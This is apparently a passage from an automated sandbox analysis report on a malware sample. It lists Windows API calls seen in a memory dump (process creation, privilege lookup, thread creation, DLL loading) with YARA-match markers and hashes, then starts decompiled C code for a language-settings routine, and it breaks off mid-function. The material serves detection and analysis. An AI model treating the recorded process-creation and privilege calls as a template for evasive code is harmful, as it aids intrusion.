                                                                                                                                                                                                              • String ID: net.dll$wininet.dll
                                                                                                                                                                                                              • API String ID: 3472027048-1269752229
                                                                                                                                                                                                              • Opcode ID: ac052f82b842673a171c0ff239f5a2ea145da3fa31acfb0f0be4a3a6f46f3c5f
                                                                                                                                                                                                              • Instruction ID: c71ef4f9991e5e487f443323638a774547d7c53b952bdd00561742697391ac3d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac052f82b842673a171c0ff239f5a2ea145da3fa31acfb0f0be4a3a6f46f3c5f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F83192B2601704ABCB25DF68DCA1FA7B7F8BB88700F00842DF61A5B242D730B545DBA0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 00096F98
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                                              • String ID: net.dll$wininet.dll
                                                                                                                                                                                                              • API String ID: 3472027048-1269752229
                                                                                                                                                                                                              • Opcode ID: 01da4fabe7839a42ca656021b921e9e59948d586d0325987776705678f3c8cbd
                                                                                                                                                                                                              • Instruction ID: 0bb8187a5adf447604ef09273a109829283f6c593fa175d8e877eb91db1ed3d7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01da4fabe7839a42ca656021b921e9e59948d586d0325987776705678f3c8cbd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1021A5B2505304ABCB25DF58DCA1FABB7F4BF88700F10812DF6195B282D371A545DBA1
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CFB2,0008CFB2,?,00000000,?,?), ref: 00098670
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LookupPrivilegeValue
                                                                                                                                                                                                              • String ID: fD
                                                                                                                                                                                                              • API String ID: 3899507212-1726987543
                                                                                                                                                                                                              • Opcode ID: a5f1f1a871054fe1915b01bce940397300920ef1c30dceb48758e5ee460f4233
                                                                                                                                                                                                              • Instruction ID: 409b7a8a861d56bc65c23d8268113d3fb22b8e20ccb348435d1b2950653511b3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5f1f1a871054fe1915b01bce940397300920ef1c30dceb48758e5ee460f4233
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C0121B1600308ABDB14DF54CC45EEB3799EF89754F058464BE4D6B782D974E910C7E1
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 0009850D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                              • String ID: .z`
                                                                                                                                                                                                              • API String ID: 3298025750-1441809116
                                                                                                                                                                                                              • Opcode ID: adaa83d9354336c7b343e02ec06a0cc07765a108c770ec09baeb0a11672d304b
                                                                                                                                                                                                              • Instruction ID: 2d436c1ccdd46ab0a6eca24e1b70874ec06ba835148f20f0023fa99a796ec446
                                                                                                                                                                                                              • Opcode Fuzzy Hash: adaa83d9354336c7b343e02ec06a0cc07765a108c770ec09baeb0a11672d304b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27E06D712002046FCB14DF54CC45EA73B69AF84350F008584FD0957352C630E900CBA0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(&5,?,00093C9F,00093C9F,?,00093526,?,?,?,?,?,00000000,00000000,?), ref: 000984CD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                              • String ID: &5
                                                                                                                                                                                                              • API String ID: 1279760036-409770322
                                                                                                                                                                                                              • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                                                              • Instruction ID: 6c0df915bea2caa36fd6f015e2c09beeb15b00678bc36b369e12ab64941e322a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CE012B1200208ABDB14EF99CC41EA777ACAF88650F118558BA089B282CA30F910CBF0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 0009850D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                              • String ID: .z`
                                                                                                                                                                                                              • API String ID: 3298025750-1441809116
                                                                                                                                                                                                              • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                                                              • Instruction ID: bcf903c7991c295c04e1ffd94516c1785eeebb9a2bad9424d7e0369f9934967b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91E01AB12002086BDB14DF59CC45EA777ACAF88750F018554B90857282C630E910CAF0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872CA
                                                                                                                                                                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872EB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1836367815-0
                                                                                                                                                                                                              • Opcode ID: b1f2331b0810d28ac44f054cd9b83341ef49fb6fc314549f8dff0e5c73b95d59
                                                                                                                                                                                                              • Instruction ID: 890b9536173f0d1ac96ba421bf0af5f3428debe7a451986ede6eb0716dff7d3d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1f2331b0810d28ac44f054cd9b83341ef49fb6fc314549f8dff0e5c73b95d59
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3601A232A8022877EB20B6949C43FFE776C6B00B51F150118FF44BA1C2E694AA0687F6
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00089BA2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Load
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2234796835-0
                                                                                                                                                                                                              • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                                                                              • Instruction ID: 5ac55fa03450ebc64b1ba5b4960ba0ef4bdd9fbf4f82a0388a50bac58c5ba662
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE0100B5E0010DABDF10EAE4ED42FDDB7B8AB54308F044195A91997142F671EB14D791
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 02b5c3f9e2adb3cf7a1222feca9d33d709659fbcfcf389e82e4fcbfb9bed17a5
                                                                                                                                                                                                              • Instruction ID: e05053c35fdcc79608a2a08cfa60d67ea2e0391e4842a7ab52aadbea7e333cc2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02b5c3f9e2adb3cf7a1222feca9d33d709659fbcfcf389e82e4fcbfb9bed17a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23F090752442146FCB00EF98DC85DEB77A8DF85620B04C56AF94C8B343C631E91487E0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000985A4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateInternalProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2186235152-0
                                                                                                                                                                                                              • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                                                              • Instruction ID: a75b1cc5d5cdda9bd078e5c52ba7b154e600acc1af2e2c97a8f66359dc0dc13e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E801AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCE0,?,?), ref: 0009705C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2422867632-0
                                                                                                                                                                                                              • Opcode ID: 6d34c6e598135bf535da216d5527c321fb023720bd5cf6a1c6f715cbcdd2cb36
                                                                                                                                                                                                              • Instruction ID: 80d1f6a64ca2ac9d56c1e475fd218f3626d575b84989f62661b6b9b0ced218d5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d34c6e598135bf535da216d5527c321fb023720bd5cf6a1c6f715cbcdd2cb36
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0E06D333912043AE7306599AC02FE7B29C8B81B20F140026FA0DEA2C2D595F80142A4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CFB2,0008CFB2,?,00000000,?,?), ref: 00098670
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LookupPrivilegeValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3899507212-0
                                                                                                                                                                                                              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                                                              • Instruction ID: ba115d3dc9753696b117ea0f5378861b5dd38b33d8e5faebc7740d5019f6ccb2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2E01AB12002086BDB10DF49CC85EE737ADAF89650F018154BA0857282C930E8108BF5
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,00087C73,?), ref: 0008D44B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorMode
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2340568224-0
                                                                                                                                                                                                              • Opcode ID: 98c6c86eb41f72e7784973740a733378406c52e1258e02267acab45d65a33c83
                                                                                                                                                                                                              • Instruction ID: 6c90e98f6ab881d1555933fc145d246b54da8f5e4d2a8dace3a7bd9ee30e7154
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98c6c86eb41f72e7784973740a733378406c52e1258e02267acab45d65a33c83
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69E08C316403046BEB20EEB4CC03FA6B7D5AFA8740F298168F989E73D3DB31D4018A50
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,00087C73,?), ref: 0008D44B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorMode
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2340568224-0
                                                                                                                                                                                                              • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                                                                                                              • Instruction ID: 5ee596a1bfbfaa077a92055b3d8a9dc3091a8f25d82d4e0fe3606be2394aea5d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AD0A7717503043BEA10FAA49C07F6673CD6B44B00F494074F948D73C3D964F9004565
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                              			E00878788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                              				short* _v12;
                                                                                                                                                                                                              				void* _v16;
                                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                                              				signed int _v28;
                                                                                                                                                                                                              				signed int _v32;
                                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                                              				signed int _v40;
                                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                                              				signed int _v48;
                                                                                                                                                                                                              				signed int _v52;
                                                                                                                                                                                                              				signed int _v56;
                                                                                                                                                                                                              				signed int _v60;
                                                                                                                                                                                                              				char _v68;
                                                                                                                                                                                                              				void* _t216;
                                                                                                                                                                                                              				intOrPtr _t231;
                                                                                                                                                                                                              				short* _t235;
                                                                                                                                                                                                              				intOrPtr _t257;
                                                                                                                                                                                                              				short* _t261;
                                                                                                                                                                                                              				intOrPtr _t284;
                                                                                                                                                                                                              				intOrPtr _t288;
                                                                                                                                                                                                              				void* _t314;
                                                                                                                                                                                                              				signed int _t318;
                                                                                                                                                                                                              				short* _t319;
                                                                                                                                                                                                              				intOrPtr _t321;
                                                                                                                                                                                                              				void* _t328;
                                                                                                                                                                                                              				void* _t329;
                                                                                                                                                                                                              				char* _t332;
                                                                                                                                                                                                              				signed int _t333;
                                                                                                                                                                                                              				signed int* _t334;
                                                                                                                                                                                                              				void* _t335;
                                                                                                                                                                                                              				void* _t338;
                                                                                                                                                                                                              				void* _t339;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t328 = __edx;
                                                                                                                                                                                                              				_t322 = __ecx;
                                                                                                                                                                                                              				_t318 = 0;
                                                                                                                                                                                                              				_t334 = _a4;
                                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                                              				_v28 = 0;
                                                                                                                                                                                                              				_v48 = 0;
                                                                                                                                                                                                              				_v20 = 0;
                                                                                                                                                                                                              				_v40 = 0;
                                                                                                                                                                                                              				_v32 = 0;
                                                                                                                                                                                                              				_v52 = 0;
                                                                                                                                                                                                              				if(_t334 == 0) {
                                                                                                                                                                                                              					_t329 = 0xc000000d;
                                                                                                                                                                                                              					L49:
                                                                                                                                                                                                              					_t334[0x11] = _v56;
                                                                                                                                                                                                              					 *_t334 =  *_t334 | 0x00000800;
                                                                                                                                                                                                              					_t334[0x12] = _v60;
                                                                                                                                                                                                              					_t334[0x13] = _v28;
                                                                                                                                                                                                              					_t334[0x17] = _v20;
                                                                                                                                                                                                              					_t334[0x16] = _v48;
                                                                                                                                                                                                              					_t334[0x18] = _v40;
                                                                                                                                                                                                              					_t334[0x14] = _v32;
                                                                                                                                                                                                              					_t334[0x15] = _v52;
                                                                                                                                                                                                              					return _t329;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_v56 = 0;
                                                                                                                                                                                                              				if(E00878460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                                                                              					_v56 = 1;
                                                                                                                                                                                                              					if(_v8 != 0) {
                                                                                                                                                                                                              						_t207 = E0085E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_push(1);
                                                                                                                                                                                                              					_v8 = _t318;
                                                                                                                                                                                                              					E0087718A(_t207);
                                                                                                                                                                                                              					_t335 = _t335 + 4;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_v60 = _v60 | 0xffffffff;
                                                                                                                                                                                                              				if(E00878460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                                                                              					_t333 =  *_v8;
                                                                                                                                                                                                              					_v60 = _t333;
                                                                                                                                                                                                              					_t314 = E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                                                              					_push(_t333);
                                                                                                                                                                                                              					_v8 = _t318;
                                                                                                                                                                                                              					E0087718A(_t314);
                                                                                                                                                                                                              					_t335 = _t335 + 4;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t216 = E00878460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                                                                                                                                                              				_t332 = ";";
                                                                                                                                                                                                              				if(_t216 < 0) {
                                                                                                                                                                                                              					L17:
                                                                                                                                                                                                              					if(E00878460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                                                                              						L30:
                                                                                                                                                                                                              						if(E00878460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                                                                              							L46:
                                                                                                                                                                                                              							_t329 = 0;
                                                                                                                                                                                                              							L47:
                                                                                                                                                                                                              							if(_v8 != _t318) {
                                                                                                                                                                                                              								E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							if(_v28 != _t318) {
                                                                                                                                                                                                              								if(_v20 != _t318) {
                                                                                                                                                                                                              									E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                                                                              									_v20 = _t318;
                                                                                                                                                                                                              									_v40 = _t318;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							goto L49;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t231 = _v24;
                                                                                                                                                                                                              						_t322 = _t231 + 4;
                                                                                                                                                                                                              						_push(_t231);
                                                                                                                                                                                                              						_v52 = _t322;
                                                                                                                                                                                                              						E0087718A(_t231);
                                                                                                                                                                                                              						if(_t322 == _t318) {
                                                                                                                                                                                                              							_v32 = _t318;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							_v32 = E0085E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						if(_v32 == _t318) {
                                                                                                                                                                                                              							_v52 = _t318;
                                                                                                                                                                                                              							L58:
                                                                                                                                                                                                              							_t329 = 0xc0000017;
                                                                                                                                                                                                              							goto L47;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							E00852340(_v32, _v8, _v24);
                                                                                                                                                                                                              							_v16 = _v32;
                                                                                                                                                                                                              							_a4 = _t318;
                                                                                                                                                                                                              							_t235 = E0086E679(_v32, _t332);
                                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                                              								_t319 = _t235;
                                                                                                                                                                                                              								if(_t319 == 0) {
                                                                                                                                                                                                              									break;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								 *_t319 = 0;
                                                                                                                                                                                                              								_t321 = _t319 + 2;
                                                                                                                                                                                                              								E0085E2A8(_t322,  &_v68, _v16);
                                                                                                                                                                                                              								if(E00875553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                                              									_a4 = _a4 + 1;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								_v16 = _t321;
                                                                                                                                                                                                              								_t235 = E0086E679(_t321, _t332);
                                                                                                                                                                                                              								_pop(_t322);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t236 = _v16;
                                                                                                                                                                                                              							if( *_v16 != _t319) {
                                                                                                                                                                                                              								E0085E2A8(_t322,  &_v68, _t236);
                                                                                                                                                                                                              								if(E00875553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                                              									_a4 = _a4 + 1;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							if(_a4 == 0) {
                                                                                                                                                                                                              								E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                                                                                                                                                              								_v52 = _v52 & 0x00000000;
                                                                                                                                                                                                              								_v32 = _v32 & 0x00000000;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							if(_v8 != 0) {
                                                                                                                                                                                                              								E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                              							_t318 = 0;
                                                                                                                                                                                                              							goto L46;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t257 = _v24;
                                                                                                                                                                                                              					_t322 = _t257 + 4;
                                                                                                                                                                                                              					_push(_t257);
                                                                                                                                                                                                              					_v40 = _t322;
                                                                                                                                                                                                              					E0087718A(_t257);
                                                                                                                                                                                                              					_t338 = _t335 + 4;
                                                                                                                                                                                                              					if(_t322 == _t318) {
                                                                                                                                                                                                              						_v20 = _t318;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						_v20 = E0085E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(_v20 == _t318) {
                                                                                                                                                                                                              						_v40 = _t318;
                                                                                                                                                                                                              						goto L58;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						E00852340(_v20, _v8, _v24);
                                                                                                                                                                                                              						_v16 = _v20;
                                                                                                                                                                                                              						_a4 = _t318;
                                                                                                                                                                                                              						_t261 = E0086E679(_v20, _t332);
                                                                                                                                                                                                              						_t335 = _t338 + 0x14;
                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                              							_v12 = _t261;
                                                                                                                                                                                                              							if(_t261 == _t318) {
                                                                                                                                                                                                              								break;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_v12 = _v12 + 2;
                                                                                                                                                                                                              							 *_v12 = 0;
                                                                                                                                                                                                              							E0085E2A8(_v12,  &_v68, _v16);
                                                                                                                                                                                                              							if(E00875553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                                              								_a4 = _a4 + 1;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_v16 = _v12;
                                                                                                                                                                                                              							_t261 = E0086E679(_v12, _t332);
                                                                                                                                                                                                              							_pop(_t322);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t269 = _v16;
                                                                                                                                                                                                              						if( *_v16 != _t318) {
                                                                                                                                                                                                              							E0085E2A8(_t322,  &_v68, _t269);
                                                                                                                                                                                                              							if(E00875553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                                              								_a4 = _a4 + 1;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						if(_a4 == _t318) {
                                                                                                                                                                                                              							E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                                                                              							_v40 = _t318;
                                                                                                                                                                                                              							_v20 = _t318;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						if(_v8 != _t318) {
                                                                                                                                                                                                              							E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_v8 = _t318;
                                                                                                                                                                                                              						goto L30;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t284 = _v24;
                                                                                                                                                                                                              				_t322 = _t284 + 4;
                                                                                                                                                                                                              				_push(_t284);
                                                                                                                                                                                                              				_v48 = _t322;
                                                                                                                                                                                                              				E0087718A(_t284);
                                                                                                                                                                                                              				_t339 = _t335 + 4;
                                                                                                                                                                                                              				if(_t322 == _t318) {
                                                                                                                                                                                                              					_v28 = _t318;
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					_v28 = E0085E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				if(_v28 == _t318) {
                                                                                                                                                                                                              					_v48 = _t318;
                                                                                                                                                                                                              					goto L58;
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					E00852340(_v28, _v8, _v24);
                                                                                                                                                                                                              					_v16 = _v28;
                                                                                                                                                                                                              					_a4 = _t318;
                                                                                                                                                                                                              					_t288 = E0086E679(_v28, _t332);
                                                                                                                                                                                                              					_t335 = _t339 + 0x14;
                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                              						_v12 = _t288;
                                                                                                                                                                                                              						if(_t288 == _t318) {
                                                                                                                                                                                                              							break;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_v12 = _v12 + 2;
